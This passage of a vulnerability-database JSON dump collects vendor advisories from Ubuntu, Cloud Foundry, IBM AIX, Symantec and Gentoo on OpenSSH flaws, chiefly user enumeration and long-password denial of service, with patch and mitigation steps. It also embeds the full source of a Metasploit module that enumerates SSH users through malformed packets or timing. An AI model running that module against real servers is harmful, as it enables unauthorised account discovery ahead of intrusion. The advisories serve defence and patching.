\n(CVE-2016-6515)", "edition": 5, "modified": "2016-08-15T00:00:00", "published": "2016-08-15T00:00:00", "id": "USN-3061-1", "href": "https://ubuntu.com/security/notices/USN-3061-1", "title": "OpenSSH vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:53", "bulletinFamily": "software", "cvelist": ["CVE-2016-6515", "CVE-2016-6210"], "description": "USN-3061-1 OpenSSH vulnerability\n\n# \n\nMedium\n\n# Vendor\n\nCanonical Ubuntu, openssh\n\n# Versions Affected\n\nCanonical Ubuntu 14.04 LTS\n\n# Description\n\nEddie Harari discovered that OpenSSH incorrectly handled password hashing when authenticating non-existing users. A remote attacker could perform a timing attack and enumerate valid users. ([CVE-2016-6210](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6210.html>))\n\nTomas Kuthan, Andres Rojas, and Javier Nieto discovered that OpenSSH did not limit password lengths. A remote attacker could use this issue to cause OpenSSH to consume resources, leading to a denial of service. ([CVE-2016-6515](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6515.html>))\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. \n_\n\n * Cloud Foundry BOSH stemcells 3146.x versions prior to 3146.20 AND 3232.x versions prior to 3232.17 AND other versions prior to 3262.8 are vulnerable\n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.75.0\n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry team has released patched BOSH stemcells 3146.20 and 3232.17 with an upgraded Linux kernel that resolves the aforementioned issues. 
We recommend that Operators upgrade BOSH stemcell 3146.x versions to 3146.20 OR 3232.x versions to 3232.17\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.75.0 or later versions3232\n\n# Credit\n\nEddie Harari, Tomas Kuthan, Javier Nieto, and Andres Rojas\n\n# References\n\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6210.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-6515.html>\n", "edition": 5, "modified": "2016-08-25T00:00:00", "published": "2016-08-25T00:00:00", "id": "CFOUNDRY:3C7597DAEB0A160E9DA1752927007C7C", "href": "https://www.cloudfoundry.org/blog/usn-3061-1/", "title": "USN-3061-1 OpenSSH vulnerability | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "aix": [{"lastseen": "2019-05-29T19:19:13", "bulletinFamily": "unix", "cvelist": ["CVE-2015-8325", "CVE-2016-6515", "CVE-2016-6210"], "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Thu Sep 8 14:36:37 CDT 2016\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc\nhttps://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc\nftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc\n\nSecurity Bulletin: Vulnerabilities in OpenSSH affect AIX (CVE-2015-8325,\nCVE-2016-6210 and CVE-2016-6515)\n \n \n===============================================================================\n\nSUMMARY:\n\nVulnerabilities in OpenSSH affect AIX\n \n \n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2015-8325\n DESCRIPTION: When the UseLogin feature is enabled and PAM is configured to \n read .pam_environment files in user home directories, allows local users \n to gain privileges by triggering a crafted environment for the /bin/login \n program, as demonstrated by an LD_PRELOAD environment 
variable.\n CVSS Base Score: 7.4\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/114628 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n \n CVEID: CVE-2016-6210\n DESCRIPTION: An attacker can measure timing differences in password \n authentication that could be used to discern valid from invalid account \n names when long passwords were sent and particular password hashing\n algorithms are in use on the server \n CVSS Base Score: 4.3\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/115128 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n \n CVEID: CVE-2016-6515\n DESCRIPTION: sshd does not limit password lengths for password authentication, \n which allows remote attackers to cause a denial of service \n (crypt CPU consumption) via a long string. \n CVSS Base Score: 7.5 \n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/115911 for the \n current score.\n CVSS Environmental Score*: Undefined\n CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n \n AFFECTED PRODUCTS AND VERSION:\n \n AIX 5.3, 6.1, 7.1, 7.2\n VIOS 2.2.x\n \n The following fileset levels are vulnerable:\n \n key_fileset = osrcaix\n \n Fileset Lower Level Upper Level KEY\n -------------------------------------------------------------\n openssh.base.client 4.0.0.5200 6.0.0.6202 key_w_fs\n openssh.base.server 4.0.0.5200 6.0.0.6202 key_w_fs\n \n Note: To determine if your system is vulnerable, execute the\n following commands:\n\n lslpp -L | grep -i openssh.base.client\n lslpp -L | grep -i openssh.base.server\n\n \n REMEDIATION:\n\n A. FIXES\n\n Fixes are available. 
The fixes can be downloaded via ftp and\n http from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_fix9.tar\n http://aix.software.ibm.com/aix/efixes/security/openssh_fix9.tar\n https://aix.software.ibm.com/aix/efixes/security/openssh_fix9.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n releases.\n\n Note that the tar file contains Interim fixes that are based on\n OpenSSH version as given below - \n\n You must be on the 'prereq for installation' level before\n applying the interim fix. This may require installing a new\n level(prereq version) first.\n \n\n AIX Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n --------------------------------------------------------------------------------------------\n 5.3, 6.1, 7.1, 7.2 6202_ifix.160830.epkg.Z openssh.base(6.0.0.6202 version) key_w_fix\n\n VIOS Level Interim Fix (*.Z) Fileset Name(prereq for installation) KEY\n ----------------------------------------------------------------------------------------\n 2.2.* 6202_ifix.160830.epkg.Z openssh.base(6.0.0.6202 version) key_w_fix\n\n\n Latest level of OpenSSH fileset is available from the web download site:\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=openssh&cp=UTF-8\n\n \n To extract the fix from the tar file:\n\n tar xvf openssh_fix9.tar\n cd openssh_fix9\n\n Verify you have retrieved the fix intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command is the followng:\n\n openssl dgst -sha256 filename KEY\n -----------------------------------------------------------------------------------------------------\n d7d9c1dd5cfb8687a641daab19254f24e6ab4f2677f263acd21742e42ff02a50 6202_ifix.160830.epkg.Z key_w_csum\n\n \n These sums should match exactly. 
The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the integrity\n of the fixes. If the sums or signatures cannot be confirmed,\n contact IBM AIX Security at security-alert@austin.ibm.com and\n describe the discrepancy.\n \n Published advisory OpenSSL signature file location:\n\n http://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc.sig \n\n openssl dgst -sha1 -verify <pubkey_file> -signature\n <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature\n <ifix_file>.sig <ifix_file>\n \n\n \n \n B. FIX AND INTERIM FIX INSTALLATION\n\n After applying fix, IBM recommends that you regenerate your SSH keys as\n a precaution. \n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n\n WORKAROUNDS AND MITIGATIONS:\n \n None.\n \n 
\n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n\n Note: Keywords labeled as KEY in this document are used for parsing purposes.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. 
All other trademarks\n are property of their respective holders.\n\n Complete CVSS v3 Guide: http://www.first.org/cvss/user-guide\n On-line Calculator v3:\n http://www.first.org/cvss/calculator/3.0\n\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/114628\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/115128\n X-Force Vulnerability Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/115911\n CVE-2015-8325 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8325\n CVE-2016-6210 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6210\n CVE-2016-6515 : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6515\n \n\nACKNOWLEDGEMENTS:\n\n None\n \n \nCHANGE HISTORY:\n\n First Issued: Thu Sep 8 14:36:37 CDT 2016\n\n\n===============================================================================\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n \n\n", "edition": 4, "modified": "2016-09-08T14:36:37", "published": "2016-09-08T14:36:37", "id": "OPENSSH_ADVISORY9.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/openssh_advisory9.asc", "title": "AIX OpenSSH Vulnerability", "type": "aix", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "symantec": [{"lastseen": "2021-01-15T20:47:33", "bulletinFamily": "software", "cvelist": ["CVE-2016-6210", "CVE-2016-6515", "CVE-2016-8858"], "description": "### SUMMARY \n\nBlue Coat products using affected versions of OpenSSH are susceptible to several vulnerabilities. A remote attacker, with access to the management interface, can exploit these vulnerabilities to enumerate existing user accounts and cause denial of service through excessive CPU consumption and memory exhaustion. \n \n\n\n### AFFECTED PRODUCTS \n\nThe following products are vulnerable:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-8858 | 6.7 | Not vulnerable, fixed in 6.7.2.1 \n6.6 | Upgrade to 6.6.5.4. \n \n \n\n**CacheFlow** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-8858 | 3.4 | Upgrade to 3.4.2.8. \n \n \n\n**Director** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-6515 | 6.1 | Upgrade to 6.1.23.1. \nCVE-2016-6210, CVE-2016-8858 | 6.1.22.1 only | Upgrade to 6.1.23.1. \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-6210, CVE-2016-6515 | 4.2 | Upgrade to 4.2.10. \nCVE-2016-8858 | 4.2 | See Mitigation section for workaround instructions. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-6210, CVE-2016-6515 | 5.4 | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to a later release with fixes. 
\nCVE-2016-8858 | 5.3, 5.4 | Not available at this time \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | A fix will not be provided. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | A fix will not be provided. Customers who use NSP for USB cleaning can switch to a version of ICSP with fixes. \n \n \n\n**PacketShaper (PS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-8858 | 9.2 (only affects other SSH management connections) | Not vulnerable, fixed in 9.2.13p7 \n \n \n\n**ProxySG** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-8858 | 6.7 and later | Not vulnerable, fixed in 6.7.1.1 \n6.6 | Upgrade to 6.6.5.4. \n6.5 | Upgrade to 6.5.10.1. \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 3.12 and later | Not vulnerable, fixed in 3.12.1.1 \nCVE-2016-6210, CVE-2016-6515 | 3.11 | Not vulnerable, fixed in 3.11.1.1 \n3.10 | Not vulnerable, fixed in 3.10.1.1 \n3.9 | Upgrade to 3.9.6.1. \n3.8.4FC | Upgrade to a later release with fixes. \nCVE-2016-8858 | 3.11 | Upgrade to 3.11.2.1. \n3.10.3.1 | Upgrade to 3.10.3.1. \n3.9 | Upgrade to a later release with fixes. \n3.8.4FC | Upgrade to a later release with fixes. \n \n \n\nWeb Isolation (WI) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-8858 | 1.13, 1.14 | Not available at this time \n1.12 | Upgrade to a later release with fixes. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-6210, CVE-2016-6515 | 9.7, 10.0, 11.0 (only APM software) | A fix will not be provided. \n \n### \nADDITIONAL PRODUCT INFORMATION \n\nBlue Coat products do not enable or use all functionality within OpenSSH. 
The products listed below do not utilize the functionality described in the CVEs below and are thus not known to be vulnerable to them. However, fixes for these CVEs will be included in the patches that are provided.\n\n * **PacketShaper:** CVE-2016-6210 and CVE-2016-6515\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nContent Analysis System \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMail Threat Defense \nManagement Center \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nReporter \nSecurity Analytics \nUnified Agent**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. \n \n\n\n### ISSUES\n\n**CVE-2016-6210** \n--- \n**Severity / CVSSv2** | Medium / 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n**References** | SecurityFocus: [BID 91812](<https://www.securityfocus.com/bid/91812>) / NVD: [CVE-2016-6210](<https://nvd.nist.gov/vuln/detail/CVE-2016-6210>) \n**Impact** | Information disclosure \n**Description** | A timing difference between password authentication of existing and non-existing user accounts allows a remote attacker to make authentication attempts with large passwords and enumerate the existing user accounts on the target system. 
\n \n \n\n**CVE-2016-6515** \n--- \n**Severity / CVSSv2** | High / 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 92212](<https://www.securityfocus.com/bid/92212>) / NVD: [CVE-2016-6515](<https://nvd.nist.gov/vuln/detail/CVE-2016-6515>) \n**Impact** | Denial of service \n**Description** | An insufficient input validation flaw in password authentication allows a remote attacker to send a long password string and cause excessive CPU consumption, resulting in denial of service. \n \n \n\n**CVE-2016-8858** \n--- \n**Severity / CVSSv2** | High / 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 93776](<https://www.securityfocus.com/bid/93776>) / NVD: [CVE-2016-8858](<https://nvd.nist.gov/vuln/detail/CVE-2016-8858>) \n**Impact** | Denial of service \n**Description** | A flaw in message handling allows a remote attacker to repeatedly send the KEXINIT SSH message and cause memory exhaustion, resulting in denial of service. \n \n \n\n### MITIGATION \n\nThese vulnerabilities can be exploited only through the management interfaces for all vulnerable products. Allowing only machines, IP addresses and subnets from a trusted network to access the management interface reduces the threat of exploiting the vulnerabilities.\n\nCVE-2016-8858 can be remediated in Malware Analysis by limiting the maximum number of concurrent unauthenticated connections to the SSH daemon. Customers should use the following steps in the management CLI:\n\n 1. Create a backup copy of the SSH daemon configuration file: cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak\n 2. Add the line \"MaxStartups 5:100:5\" to /etc/ssh/sshd_config\n 3. Restart SSH daemon: service ssh restart \n \n\n\n### REVISION\n\n2021-01-15 WI 1.14 is vulnerable to CVE-2016-8858. A fix is not available at this time. Fixes will not be provided for WI 1.12. Please upgrade to a later release with the vulnerability fixes. \n2020-11-17 A fix for XOS 9.7, 10.0, and 11.0 will not be provided. 
\n2020-04-29 A fix will not be provided for ICSP. Please upgrade to a later release with the vulnerability fixes. \n2019-10-07 WI 1.12 and 1.13 are vulnerable to CVE-2016-8858. A fix is not available at this time. Fixes will not be provided for SSLV 3.8.4fc and XOS 9.7. Please upgrade to a later release with the vulnerability fixes. \n2019-01-21 ICSP 5.4 is not vulnerable to CVE-2016-6210 and CVE-2016-6515 because a fix is available in 5.4.1. \n2018-09-24 A fix for SSLV 3.8.4FC will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-08-03 Customers who use NSP for USB cleaning can switch to a version of Industrial Control System Protection (ICSP) with fixes. \n2018-07-30 See Mitigation section for workaround instructions for CVE-2016-8858 in MA 4.2. \n2018-07-01 A fix for PacketShaper 9.2 is available in 9.2.13p7. \n2018-06-29 A fix for Norman Shark Network Protection (NNP) 5.3 and Norman Shark SCADA Protection (NSP) 5.3 will not be provided. \n2018-04-25 A fix for XOS 9.7 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-06 A fix for CVE-2016-6210 and CVE-2016-6515 in SSLV 3.9 is available in 3.9.6.1 \n2017-11-16 A fix for SSLV 3.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-15 SSLV 3.12 is not vulnerable because a fix is available in 3.12.1.1. \n2017-11-06 ASG 6.7 is not vulnerable because a fix is available in 6.7.2.1. \n2017-08-15 A fix for CVE-2016-8858 in SSLV 3.10 is available in 3.10.3.1. \n2017-08-02 SSLV 4.1 is not vulnerable. \n2017-04-30 A fix for Director 6.1 is available in 6.1.23.1. \n2017-04-29 A fix for CacheFlow 3.4 is available in 3.4.2.8. \n2017-04-26 Added CVSS v2 score for CVE-2016-6210 and base score for Security Advisory. \n2017-03-29 It was previously reported that ASG 6.6 is not vulnerable to CVE-2016-8858. Further investigation has shown that ASG 6.6 is vulnerable to CVE-2016-8858. 
A fix is available in 6.6.5.4. \n2017-03-29 A fix for ProxySG 6.6 is available in 6.6.5.4. \n2017-03-08 A fix for ProxySG 6.5 is available in 6.5.10.1. \n2017-03-08 ProxySG 6.7 is not vulnerable because a fix is available in 6.7.1.1. SSLV 4.0 is not vulnerable. \n2016-01-25 SSLV 3.11.2.1 remediates CVE-2016-8858 by restricting the number of concurrent unauthenticated incoming SSH connections. \n2016-12-13 initial public release \n2016-01-20 It was previously reported that ASG, CAS, MTD, MC, PacketShaper S-Series, PolicyCenter S-Series, Reporter 10.1, Security Analytics, and XOS are vulnerable to CVE-2016-8858. Further investigation has shown that these products are not vulnerable.\n", "modified": "2021-01-15T20:16:28", "published": "2016-12-13T08:00:00", "id": "SMNTC-1390", "href": "", "type": "symantec", "title": "SA136 : OpenSSH Vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "metasploit": [{"lastseen": "2020-07-15T20:40:44", "description": "This module uses a malformed packet or timing attack to enumerate users on an OpenSSH server. The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST packet using public key authentication (must be enabled) to enumerate users. On some versions of OpenSSH under some configurations, OpenSSH will return a \"permission denied\" error for an invalid user faster than for a valid user, creating an opportunity for a timing attack to enumerate users. Testing note: invalid users were logged, while valid users were not. 
YMMV.\n", "published": "2014-04-28T18:47:15", "type": "metasploit", "title": "SSH Username Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0190", "CVE-2006-5229", "CVE-2016-6210", "CVE-2018-15473"], "modified": "2018-09-15T23:54:45", "id": "MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SSH\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SSH Username Enumeration',\n 'Description' => %q{\n This module uses a malformed packet or timing attack to enumerate users on\n an OpenSSH server.\n\n The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST\n packet using public key authentication (must be enabled) to enumerate users.\n\n On some versions of OpenSSH under some configurations, OpenSSH will return a\n \"permission denied\" error for an invalid user faster than for a valid user,\n creating an opportunity for a timing attack to enumerate users.\n\n Testing note: invalid users were logged, while valid users were not. 
YMMV.\n },\n 'Author' => [\n 'kenkeiras', # Timing attack\n 'Dariusz Tytko', # Malformed packet\n 'Michal Sajdak', # Malformed packet\n 'Qualys', # Malformed packet\n 'wvu' # Malformed packet\n ],\n 'References' => [\n ['CVE', '2003-0190'],\n ['CVE', '2006-5229'],\n ['CVE', '2016-6210'],\n ['CVE', '2018-15473'],\n ['OSVDB', '32721'],\n ['BID', '20418'],\n ['URL', 'https://seclists.org/oss-sec/2018/q3/124'],\n ['URL', 'https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Malformed Packet',\n 'Description' => 'Use a malformed packet',\n 'Type' => :malformed_packet\n ],\n ['Timing Attack',\n 'Description' => 'Use a timing attack',\n 'Type' => :timing_attack\n ]\n ],\n 'DefaultAction' => 'Malformed Packet'\n ))\n\n register_options(\n [\n Opt::Proxies,\n Opt::RPORT(22),\n OptString.new('USERNAME',\n [false, 'Single username to test (username spray)']),\n OptPath.new('USER_FILE',\n [false, 'File containing usernames, one per line']),\n OptInt.new('THRESHOLD',\n [true,\n 'Amount of seconds needed before a user is considered ' \\\n 'found (timing attack only)', 10]),\n OptBool.new('CHECK_FALSE',\n [false, 'Check for false positives (random username)', false])\n ]\n )\n\n register_advanced_options(\n [\n OptInt.new('RETRY_NUM',\n [true , 'The number of attempts to connect to a SSH server' \\\n ' for each user', 3]),\n OptInt.new('SSH_TIMEOUT',\n [false, 'Specify the maximum time to negotiate a SSH session',\n 10]),\n OptBool.new('SSH_DEBUG',\n [false, 'Enable SSH debugging output (Extreme verbosity!)',\n false])\n ]\n )\n end\n\n def rport\n datastore['RPORT']\n end\n\n def retry_num\n datastore['RETRY_NUM']\n end\n\n def threshold\n datastore['THRESHOLD']\n end\n\n # Returns true if a nonsense username appears active.\n def check_false_positive(ip)\n user = Rex::Text.rand_text_alphanumeric(8..32)\n attempt_user(user, ip) == :success\n end\n\n def check_user(ip, user, port)\n technique = action['Type']\n\n 
opts = {\n :port => port,\n :use_agent => false,\n :config => false,\n :proxy => ssh_socket_factory,\n :non_interactive => true,\n :verify_host_key => :never\n }\n\n # The auth method is converted into a class name for instantiation,\n # so malformed-packet here becomes MalformedPacket from the mixin\n case technique\n when :malformed_packet\n opts.merge!(:auth_methods => ['malformed-packet'])\n when :timing_attack\n opts.merge!(\n :auth_methods => ['password', 'keyboard-interactive'],\n :password => rand_pass\n )\n end\n\n opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\n\n start_time = Time.new\n\n begin\n ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do\n Net::SSH.start(ip, user, opts)\n end\n rescue Rex::ConnectionError\n return :connection_error\n rescue Timeout::Error\n return :success if technique == :timing_attack\n rescue Net::SSH::AuthenticationFailed\n return :fail if technique == :malformed_packet\n rescue Net::SSH::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n end\n\n finish_time = Time.new\n\n case technique\n when :malformed_packet\n return :success if ssh\n when :timing_attack\n return :success if (finish_time - start_time > threshold)\n end\n\n :fail\n end\n\n def rand_pass\n Rex::Text.rand_text_english(64_000..65_000)\n end\n\n def do_report(ip, user, port)\n service_data = {\n address: ip,\n port: rport,\n service_name: 'ssh',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: user,\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n # Because this isn't using the AuthBrute mixin, we don't have the\n # usual peer method\n def peer(rhost=nil)\n \"#{rhost}:#{rport} - SSH -\"\n end\n\n def user_list\n users = []\n\n if datastore['USERNAME']\n users << 
datastore['USERNAME']\n elsif datastore['USER_FILE'] && File.readable?(datastore['USER_FILE'])\n users += File.read(datastore['USER_FILE']).split\n end\n\n users\n end\n\n def attempt_user(user, ip)\n attempt_num = 0\n ret = nil\n\n while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)\n if attempt_num > 0\n Rex.sleep(2 ** attempt_num)\n vprint_status(\"#{peer(ip)} Retrying '#{user}' due to connection error\")\n end\n\n ret = check_user(ip, user, rport)\n attempt_num += 1\n end\n\n ret\n end\n\n def show_result(attempt_result, user, ip)\n case attempt_result\n when :success\n print_good(\"#{peer(ip)} User '#{user}' found\")\n do_report(ip, user, rport)\n when :connection_error\n print_error(\"#{peer(ip)} User '#{user}' on could not connect\")\n when :fail\n print_error(\"#{peer(ip)} User '#{user}' not found\")\n end\n end\n\n def run_host(ip)\n print_status(\"#{peer(ip)} Using #{action.name.downcase} technique\")\n\n if datastore['CHECK_FALSE']\n print_status(\"#{peer(ip)} Checking for false positives\")\n if check_false_positive(ip)\n print_error(\"#{peer(ip)} throws false positive results. Aborting.\")\n return\n end\n end\n\n users = user_list\n\n if users.empty?\n print_error('Please populate USERNAME or USER_FILE')\n return\n end\n\n print_status(\"#{peer(ip)} Starting scan\")\n users.each { |user| show_result(attempt_user(user, ip), user, ip) }\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/ssh_enumusers.rb"}], "gentoo": [{"lastseen": "2016-12-07T12:54:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2015-8325", "CVE-2016-3115", "CVE-2016-6210", "CVE-2016-8858"], "edition": 1, "description": "### Background\n\nOpenSSH is a complete SSH protocol implementation that includes SFTP client and server support. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSSH. 
